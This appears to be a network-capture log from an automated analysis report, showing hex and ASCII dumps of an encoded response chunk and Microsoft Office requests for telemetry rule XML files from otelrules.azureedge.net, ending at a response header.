                                                                                                                                                                        2024-11-21 09:37:23 UTC391INData Raw: 31 64 37 36 0d 0a 36 54 55 68 4a 69 36 51 50 6f 4f 62 55 46 42 79 61 4b 49 64 4f 4d 63 32 37 31 73 4d 31 79 4c 36 4a 56 6e 7a 41 6f 74 51 6b 38 47 53 46 31 63 45 46 4b 51 53 6f 65 67 31 63 6b 67 63 30 47 68 64 36 78 53 4f 50 79 37 74 52 4a 74 4a 4b 70 59 75 71 53 62 2b 34 39 4e 54 51 45 70 64 39 52 4b 68 2f 69 68 79 53 44 50 5a 50 31 32 70 46 4e 56 35 61 62 31 41 6d 30 6b 37 6b 6d 6e 6b 49 50 2b 69 67 56 6c 47 54 6b 76 7a 57 75 4c 33 50 54 55 58 44 63 4e 33 56 71 35 62 68 7a 59 75 2b 77 43 66 58 33 76 4a 49 4d 59 31 35 36 43 6b 56 46 4a 4e 44 4f 30 53 2b 4c 6b 31 50 6c 42 53 67 48 78 64 70 56 71 4a 50 32 65 2f 53 70 4a 42 4f 70 64 6f 2b 7a 6e 31 71 59 46 58 52 55 39 42 2b 6b 37 76 2f 54 6f 2b 45 51 66 44 50 78 54 6c 55 35 56 35 4e 76 55 54 71 6b 51 71 67
                                                                                                                                                                        Data Ascii: 1d766TUhJi6QPoObUFByaKIdOMc271sM1yL6JVnzAotQk8GSF1cEFKQSoeg1ckgc0Ghd6xSOPy7tRJtJKpYuqSb+49NTQEpd9RKh/ihySDPZP12pFNV5ab1Am0k7kmnkIP+igVlGTkvzWuL3PTUXDcN3Vq5bhzYu+wCfX3vJIMY156CkVFJNDO0S+Lk1PlBSgHxdpVqJP2e/SpJBOpdo+zn1qYFXRU9B+k7v/To+EQfDPxTlU5V5NvUTqkQqg
                                                                                                                                                                        2024-11-21 09:37:23 UTC1369INData Raw: 31 63 44 43 67 7a 31 52 4b 47 68 63 68 45 56 47 73 64 7a 54 4f 64 75 7a 53 59 67 72 41 43 66 53 33 76 4a 49 4f 45 33 38 71 43 41 57 45 42 4d 52 2b 42 63 38 2f 38 2f 4e 77 49 4d 78 58 46 51 70 6b 61 48 4e 32 69 32 53 5a 4e 4f 50 70 5a 6b 71 58 79 78 70 4a 4d 58 47 77 52 74 2f 31 66 74 38 79 55 79 55 42 57 4f 5a 68 71 69 57 4d 31 68 4c 72 46 42 6e 45 59 2f 6e 32 37 74 50 76 65 74 68 6c 68 46 54 6b 7a 31 56 75 6e 78 4d 7a 38 62 42 63 42 36 56 36 46 53 67 54 68 72 39 51 37 59 51 43 50 52 4f 4b 6b 63 39 71 43 5a 46 58 5a 48 51 76 78 62 39 37 6b 74 66 41 6c 4b 78 33 4d 61 2f 52 53 44 50 47 47 6e 51 59 70 43 4e 59 4e 73 37 44 54 38 6f 49 56 58 52 6b 4e 42 2f 46 72 6d 2b 6a 6f 32 45 51 54 4d 64 56 6d 68 56 38 31 33 4c 72 4a 59 32 42 39 37 6f 47 50 74 4e 65 4f 67
                                                                                                                                                                        Data Ascii: 1cDCgz1RKGhchEVGsdzTOduzSYgrACfS3vJIOE38qCAWEBMR+Bc8/8/NwIMxXFQpkaHN2i2SZNOPpZkqXyxpJMXGwRt/1ft8yUyUBWOZhqiWM1hLrFBnEY/n27tPvethlhFTkz1VunxMz8bBcB6V6FSgThr9Q7YQCPROKkc9qCZFXZHQvxb97ktfAlKx3Ma/RSDPGGnQYpCNYNs7DT8oIVXRkNB/Frm+jo2EQTMdVmhV813LrJY2B97oGPtNeOg
                                                                                                                                                                        2024-11-21 09:37:23 UTC1369INData Raw: 4e 49 2f 6c 58 73 2f 7a 49 31 46 41 2f 53 65 6c 4f 70 57 4d 31 33 4c 72 4a 59 32 42 39 37 76 6d 66 2f 4d 64 36 67 6d 6c 34 44 57 77 4c 72 48 4f 62 31 63 6d 70 51 44 63 56 33 55 61 4e 63 6a 53 74 72 75 30 75 5a 54 54 32 51 62 65 55 30 38 61 4b 4c 55 55 39 45 53 2f 56 4f 38 2f 77 30 49 42 70 4b 6a 6a 39 64 76 52 54 56 65 56 69 6c 56 34 6c 52 65 61 52 6a 35 7a 7a 32 74 63 74 49 44 56 30 4d 39 56 43 68 6f 58 49 35 45 41 62 48 64 31 79 68 58 49 49 32 5a 36 64 42 6c 45 6b 70 6c 6d 44 67 50 50 36 76 67 6c 70 45 53 55 66 34 55 65 58 2b 4d 33 4a 65 53 73 64 6e 47 76 30 55 75 79 6c 6a 75 57 36 54 53 7a 4c 52 66 36 63 72 73 61 53 48 46 78 73 45 53 50 35 55 36 2f 59 37 4f 42 6f 46 79 58 39 53 72 46 32 4f 4f 57 4b 7a 51 5a 52 4c 4e 70 52 6a 37 44 2f 30 6f 34 64 51 52
                                                                                                                                                                        Data Ascii: NI/lXs/zI1FA/SelOpWM13LrJY2B97vmf/Md6gml4DWwLrHOb1cmpQDcV3UaNcjStru0uZTT2QbeU08aKLUU9ES/VO8/w0IBpKjj9dvRTVeVilV4lReaRj5zz2tctIDV0M9VChoXI5EAbHd1yhXII2Z6dBlEkplmDgPP6vglpESUf4UeX+M3JeSsdnGv0UuyljuW6TSzLRf6crsaSHFxsESP5U6/Y7OBoFyX9SrF2OOWKzQZRLNpRj7D/0o4dQR
                                                                                                                                                                        2024-11-21 09:37:23 UTC1369INData Raw: 63 75 62 6b 2b 4d 52 77 43 7a 33 6c 54 71 56 36 45 4d 6d 4b 2b 52 4a 52 4f 50 70 64 68 37 44 66 77 70 34 64 64 52 55 64 50 2f 56 50 75 38 58 4a 38 55 41 33 59 50 77 4c 6c 63 5a 6f 79 59 4c 4d 41 68 77 6b 69 30 57 66 6c 63 71 6e 6a 68 31 35 46 51 6b 6e 2b 58 65 66 78 4e 7a 6f 55 43 38 5a 35 57 61 70 51 69 44 68 68 73 55 79 57 54 54 71 51 62 4f 49 39 2b 71 62 4c 47 51 4e 44 56 4c 49 45 6f 63 67 78 4a 41 63 61 7a 44 39 46 36 30 33 4e 50 6d 4c 31 47 4e 68 47 4b 5a 74 71 35 7a 66 2b 70 6f 68 59 52 45 6c 4b 2f 6c 62 6f 38 54 51 39 47 52 6a 44 63 31 53 69 57 6f 45 33 59 37 39 44 6c 51 64 31 30 57 66 78 63 71 6e 6a 70 31 42 4f 61 6b 66 2b 57 36 48 6d 66 43 74 51 44 63 77 2f 41 75 56 59 68 7a 56 6e 74 55 6d 64 54 7a 43 59 5a 65 67 35 39 4b 43 4e 57 6b 78 4e 58 76
                                                                                                                                                                        Data Ascii: cubk+MRwCz3lTqV6EMmK+RJROPpdh7Dfwp4ddRUdP/VPu8XJ8UA3YPwLlcZoyYLMAhwki0Wflcqnjh15FQkn+XefxNzoUC8Z5WapQiDhhsUyWTTqQbOI9+qbLGQNDVLIEocgxJAcazD9F603NPmL1GNhGKZtq5zf+pohYRElK/lbo8TQ9GRjDc1SiWoE3Y79DlQd10Wfxcqnjp1BOakf+W6HmfCtQDcw/AuVYhzVntUmdTzCYZeg59KCNWkxNXv
                                                                                                                                                                        2024-11-21 09:37:23 UTC1369INData Raw: 63 6a 51 66 41 38 4e 77 57 36 78 59 67 44 78 6e 73 45 47 65 51 7a 47 62 59 4f 38 30 38 4b 61 42 56 45 4a 4f 52 66 56 55 35 76 6f 67 63 6c 35 4b 78 32 63 61 2f 52 53 6b 50 6e 79 37 55 4e 68 59 64 59 67 67 37 6a 36 78 2b 38 74 54 53 55 74 49 39 56 44 6e 2f 44 51 2f 45 51 58 42 66 31 57 68 58 34 51 2f 62 37 68 46 6c 55 4d 70 6d 32 76 6d 50 76 69 76 68 68 63 4e 42 45 76 71 48 4c 6d 35 41 7a 38 65 42 4d 64 70 47 72 6f 61 6c 48 6c 70 75 51 44 41 42 7a 71 64 62 2b 6f 39 38 71 43 4b 58 56 46 57 51 50 74 55 35 50 55 35 50 42 59 59 78 6e 42 54 70 6c 65 45 50 6d 61 35 53 70 74 41 65 39 38 67 37 69 71 78 2b 38 74 30 56 46 52 42 73 6b 4f 76 34 48 49 31 48 45 71 59 50 31 4b 6f 58 49 63 39 61 62 68 48 6e 6b 34 70 6d 47 58 6e 4d 76 57 6f 68 46 46 48 52 30 7a 67 57 75 58
                                                                                                                                                                        Data Ascii: cjQfA8NwW6xYgDxnsEGeQzGbYO808KaBVEJORfVU5vogcl5Kx2ca/RSkPny7UNhYdYgg7j6x+8tTSUtI9VDn/DQ/EQXBf1WhX4Q/b7hFlUMpm2vmPvivhhcNBEvqHLm5Az8eBMdpGroalHlpuQDABzqdb+o98qCKXVFWQPtU5PU5PBYYxnBTpleEPma5SptAe98g7iqx+8t0VFRBskOv4HI1HEqYP1KoXIc9abhHnk4pmGXnMvWohFFHR0zgWuX
                                                                                                                                                                        2024-11-21 09:37:23 UTC1369INData Raw: 6b 72 48 5a 78 72 39 46 4b 77 69 62 62 6c 4e 32 46 68 31 69 43 44 75 50 72 48 37 79 31 74 4e 51 55 7a 34 57 75 58 38 4e 44 67 56 43 73 74 38 56 61 46 53 69 54 5a 75 76 6b 6d 5a 51 54 36 62 61 2b 38 2f 38 71 57 4e 46 77 30 45 53 2b 6f 63 75 62 6b 53 4b 52 30 47 78 7a 39 46 36 30 33 4e 50 6d 4c 31 47 4e 68 4d 4e 35 56 6e 36 54 2f 79 71 34 35 54 53 55 46 4d 2b 6b 37 70 2b 54 55 67 41 67 72 4a 65 6c 61 6d 56 49 6b 2f 5a 37 4e 44 6e 41 64 31 30 57 66 78 63 71 6e 6a 70 6c 74 45 62 55 76 70 48 50 36 33 4b 33 49 58 42 6f 41 6e 47 71 52 66 68 7a 5a 6a 74 6b 61 62 54 44 36 62 59 65 34 36 2f 4c 47 49 57 45 78 41 54 50 31 61 35 2f 67 39 4e 42 63 44 77 58 64 64 35 52 72 4e 50 6e 62 31 47 4e 68 70 50 4a 4a 6b 71 53 32 2f 75 73 74 51 54 77 51 55 73 6c 7a 72 38 7a 67 38
                                                                                                                                                                        Data Ascii: krHZxr9FKwibblN2Fh1iCDuPrH7y1tNQUz4WuX8NDgVCst8VaFSiTZuvkmZQT6ba+8/8qWNFw0ES+ocubkSKR0Gxz9F603NPmL1GNhMN5Vn6T/yq45TSUFM+k7p+TUgAgrJelamVIk/Z7NDnAd10WfxcqnjpltEbUvpHP63K3IXBoAnGqRfhzZjtkabTD6bYe46/LGIWExATP1a5/g9NBcDwXdd5RrNPnb1GNhpPJJkqS2/ustQTwQUslzr8zg8
                                                                                                                                                                        2024-11-21 09:37:23 UTC314INData Raw: 45 61 76 52 54 56 65 56 75 32 54 70 5a 41 4c 59 41 74 7a 69 54 37 70 4a 74 51 56 45 73 4d 76 42 7a 6e 75 57 70 68 58 6b 72 45 62 68 72 39 42 4e 39 69 4f 2b 59 58 79 42 55 6b 33 33 6d 70 4a 4c 48 37 32 52 6b 44 56 67 79 71 48 4b 62 36 49 43 41 57 43 64 5a 38 48 5a 74 71 71 69 4e 6a 73 31 65 4a 65 51 57 57 65 75 51 30 35 72 4c 48 51 6b 42 4b 51 76 56 4b 6f 62 64 79 50 56 42 53 2b 54 38 53 35 57 76 44 65 58 62 31 47 4e 68 79 4f 4a 39 75 37 69 54 67 37 71 78 4e 54 6b 4a 62 34 78 79 76 75 54 52 79 53 46 71 4f 50 31 36 30 46 4e 56 70 50 4f 34 56 79 78 42 72 77 33 2b 6e 4b 37 47 31 79 77 38 52 43 67 7a 67 48 4c 6d 35 64 54 45 43 47 4d 5a 38 54 4b 59 54 73 77 64 41 73 6b 61 64 51 43 76 54 54 75 49 6d 39 75 50 46 46 30 77 45 46 4d 73 63 71 62 6b 4e 66 46 41 53 67
                                                                                                                                                                        Data Ascii: EavRTVeVu2TpZALYAtziT7pJtQVEsMvBznuWphXkrEbhr9BN9iO+YXyBUk33mpJLH72RkDVgyqHKb6ICAWCdZ8HZtqqiNjs1eJeQWWeuQ05rLHQkBKQvVKobdyPVBS+T8S5WvDeXb1GNhyOJ9u7iTg7qxNTkJb4xyvuTRySFqOP160FNVpPO4VyxBrw3+nK7G1yw8RCgzgHLm5dTECGMZ8TKYTswdAskadQCvTTuIm9uPFF0wEFMscqbkNfFASg
                                                                                                                                                                        2024-11-21 09:37:23 UTC1369INData Raw: 32 36 66 36 0d 0a 68 31 69 43 44 2f 63 71 6e 78 78 52 64 52 42 42 53 79 47 2b 4c 72 49 44 51 54 48 4d 4d 34 5a 4a 74 58 6d 7a 52 68 76 6b 47 6d 65 52 57 63 59 65 6f 38 73 35 4b 64 57 6c 4e 48 53 66 56 69 33 2f 63 31 4a 68 63 45 78 6e 38 61 36 78 53 43 65 54 61 4d 41 4e 41 48 42 4e 38 67 38 58 4b 70 34 37 35 55 54 55 70 4c 35 45 32 73 32 69 51 2f 48 77 48 42 50 78 54 6c 55 73 31 68 50 76 73 41 6e 46 5a 37 79 54 43 37 61 61 54 77 33 41 63 52 57 77 4c 72 48 50 65 35 61 6d 42 65 53 74 49 2f 41 75 55 54 67 7a 52 76 74 6b 36 62 56 53 6d 58 59 2f 38 78 74 70 32 31 64 6b 35 50 51 50 39 54 36 73 63 4d 45 78 30 42 7a 48 4a 56 72 6d 71 7a 4c 47 32 37 54 70 39 52 4b 74 45 75 71 54 32 78 2b 37 49 58 43 77 52 7a 76 42 7a 35 75 57 70 79 4a 51 6e 4f 63 56 32 7a 52 63 41
                                                                                                                                                                        Data Ascii: 26f6h1iCD/cqnxxRdRBBSyG+LrIDQTHMM4ZJtXmzRhvkGmeRWcYeo8s5KdWlNHSfVi3/c1JhcExn8a6xSCeTaMANAHBN8g8XKp475UTUpL5E2s2iQ/HwHBPxTlUs1hPvsAnFZ7yTC7aaTw3AcRWwLrHPe5amBeStI/AuUTgzRvtk6bVSmXY/8xtp21dk5PQP9T6scMEx0BzHJVrmqzLG27Tp9RKtEuqT2x+7IXCwRzvBz5uWpyJQnOcV2zRcA
                                                                                                                                                                        2024-11-21 09:37:23 UTC1369INData Raw: 74 67 66 65 39 5a 6a 2b 79 44 33 6f 4a 31 55 42 48 70 79 31 30 76 69 36 54 51 78 4c 6a 54 72 63 31 79 69 54 6f 6f 2f 53 4a 55 41 31 67 63 30 30 54 6a 51 63 72 6e 6a 74 42 6b 44 58 41 79 71 48 4e 54 36 50 44 77 58 48 4e 45 79 66 37 4a 58 6e 54 39 74 39 51 37 59 51 58 76 4a 4d 4b 64 79 39 62 4c 4c 44 78 4d 57 46 36 63 50 74 71 6c 67 4c 56 34 54 67 47 6b 61 2f 51 62 44 65 58 7a 31 47 4e 67 41 4f 49 4e 79 37 7a 48 6e 6f 4d 78 70 66 57 4a 50 34 31 62 41 39 43 49 31 4c 6a 54 56 66 46 53 72 55 35 73 6f 4c 76 73 41 6c 77 64 6a 71 43 43 68 66 76 65 67 6e 52 64 38 43 67 7a 71 48 4c 6d 35 42 7a 45 65 42 4d 64 70 53 2b 68 79 6a 69 68 6b 6c 45 32 49 51 48 76 66 49 4f 39 79 71 66 44 46 46 30 64 56 44 4b 6f 4d 73 36 4a 6e 59 55 64 61 6b 6d 41 55 76 42 53 62 65 54 62 6e
                                                                                                                                                                        Data Ascii: tgfe9Zj+yD3oJ1UBHpy10vi6TQxLjTrc1yiToo/SJUA1gc00TjQcrnjtBkDXAyqHNT6PDwXHNEyf7JXnT9t9Q7YQXvJMKdy9bLLDxMWF6cPtqlgLV4TgGka/QbDeXz1GNgAOINy7zHnoMxpfWJP41bA9CI1LjTVfFSrU5soLvsAlwdjqCChfvegnRd8CgzqHLm5BzEeBMdpS+hyjihklE2IQHvfIO9yqfDFF0dVDKoMs6JnYUdakmAUvBSbeTbn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        16192.168.2.64972713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:24 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:24 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                        x-ms-request-id: 79148a84-101e-0017-578c-3a47c7000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093724Z-r1d97b995778dpcthC1TEB4b540000000a400000000046h7
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        17192.168.2.64972813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:24 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:24 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 467
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                        x-ms-request-id: ae573645-101e-008d-516d-3b92e5000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093724Z-1777c6cb7544nvmshC1TEBf7qc0000000an000000000f4v3
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:24 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        18192.168.2.64973013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:24 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:24 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                                                                                        x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093724Z-178bfbc474bwlrhlhC1NYCy3kg000000016000000000dt8h
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:24 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        19192.168.2.64972913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:24 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:24 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                                                                                        x-ms-request-id: 4e7b5ce8-701e-0098-117a-3b395f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093724Z-178bfbc474b7cbwqhC1NYC8z4n000000018g000000002ufm
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:24 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        20192.168.2.64973113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:24 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:24 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                                                                                        x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093724Z-178bfbc474b7cbwqhC1NYC8z4n000000019g000000000whu
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
